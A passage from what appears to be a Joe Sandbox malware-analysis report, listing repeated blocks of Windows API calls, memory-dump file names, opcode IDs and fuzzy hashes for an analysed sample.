                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveTypememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1397174798-0
                                                                                                                                                                        • Opcode ID: 46d6d8651bbad5f298d60486129b832e82091905dcf8b5bec56b496162f35204
                                                                                                                                                                        • Instruction ID: e724836340b2b7aa2e8ab5b23c3cd8b41ba37501ceb8b35c2324d54636bd635f
                                                                                                                                                                        • Opcode Fuzzy Hash: 46d6d8651bbad5f298d60486129b832e82091905dcf8b5bec56b496162f35204
                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE086B5E401159BC711DB50DD41F5DB365ABD8309F184166F51493385FBB0AA0187AD
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?), ref: 00441370
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                        • Instruction ID: 4376c3151c101c1f2856b8dd4cb0e85140bd373f91dae02cc3ec93c000e5ac0a
                                                                                                                                                                        • Opcode Fuzzy Hash: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                        • Instruction Fuzzy Hash: 09C17779606600DFCB04DF6ADC58910B7A6EB883053D5A06DD80A8777EEBF15C93CB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00420B6A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                                                        • Opcode ID: 77939f02a33e9542a9e940687560c58386b7e87b7ae7404835ffedeccafc0449
                                                                                                                                                                        • Instruction ID: c58753a3eaec20037d0e7aa0db43eaf6bc497ad6d107b14233f9619bd34f60a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 77939f02a33e9542a9e940687560c58386b7e87b7ae7404835ffedeccafc0449
                                                                                                                                                                        • Instruction Fuzzy Hash: DD5109767125109FD700CBACED85E5DBBF5FF98300B044064E845D7361EAB9AE11CB55
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00424DDC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                                                        • Opcode ID: da175ac7d2f02e5855740554e635b88b071afc912e4c86594a6ead5cd12ac510
                                                                                                                                                                        • Instruction ID: 8f7915f7f302b0412aed210de8797ba7fba1e0f5e66d0a54f8749a76c9855014
                                                                                                                                                                        • Opcode Fuzzy Hash: da175ac7d2f02e5855740554e635b88b071afc912e4c86594a6ead5cd12ac510
                                                                                                                                                                        • Instruction Fuzzy Hash: AC41297A706501EFD708CF9CDE88AA8B7E6EF893083045039E905D7361E6E5EE15CB49
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004229C3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: 0e576f4a4e8ca918f8683a8120cb3191a0af92775895f1943456b3e503e44165
                                                                                                                                                                        • Instruction ID: 61405513eb022bf9534ceec27f52b5dfe112c73a15204ae2fb07873f8d87fd45
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e576f4a4e8ca918f8683a8120cb3191a0af92775895f1943456b3e503e44165
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D41DA766001148FCB44DF68ED91ED873B8EF98708F084064E956D7276EEB0AB58CF89
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2868366576-0
                                                                                                                                                                        • Opcode ID: 4fe3f290446b70e9a691d9be0a39467e1c4bd2775169d9871b72b04186d6f2e5
                                                                                                                                                                        • Instruction ID: 43d8bf381cc227cc61c7c700bb213797217dc21dcf3a1fb5b9eb907807dedc6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4fe3f290446b70e9a691d9be0a39467e1c4bd2775169d9871b72b04186d6f2e5
                                                                                                                                                                        • Instruction Fuzzy Hash: E5412D7A902519EFDB00DF58EC8888DBBB0FF08705F149162EE119B321EBB0A955CF95
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 20e9619712d8c3800fa872adc4cf283d3e7cbdaa988b29b034e15f1b44c331e6
                                                                                                                                                                        • Instruction ID: a265500817d880a48ddfc289da5cf24c2773e9e0b2a3fe6c7fd080c8e4643ead
                                                                                                                                                                        • Opcode Fuzzy Hash: 20e9619712d8c3800fa872adc4cf283d3e7cbdaa988b29b034e15f1b44c331e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 80319177A002199FCB00DF68EC909D977B4FF893187084255D816E72A1EB70EB59CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CrackInternet
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1381609488-0
                                                                                                                                                                        • Opcode ID: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                        • Instruction ID: ad51b445d1971d488cb6eb1a7ddcfcdc88647cb932c96ebc81f61fd4cf75d457
                                                                                                                                                                        • Opcode Fuzzy Hash: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                        • Instruction Fuzzy Hash: 00212B756002049FDB40CF6ADC84E5A77E4FF48214B058175F808C7322D7B4EE568BAA
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,0066C376,00000000,?,?), ref: 004320E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: a6db715217e1f96c528aa59cd035334b4a03f76ba9324f30c828fcdbcc1cefb8
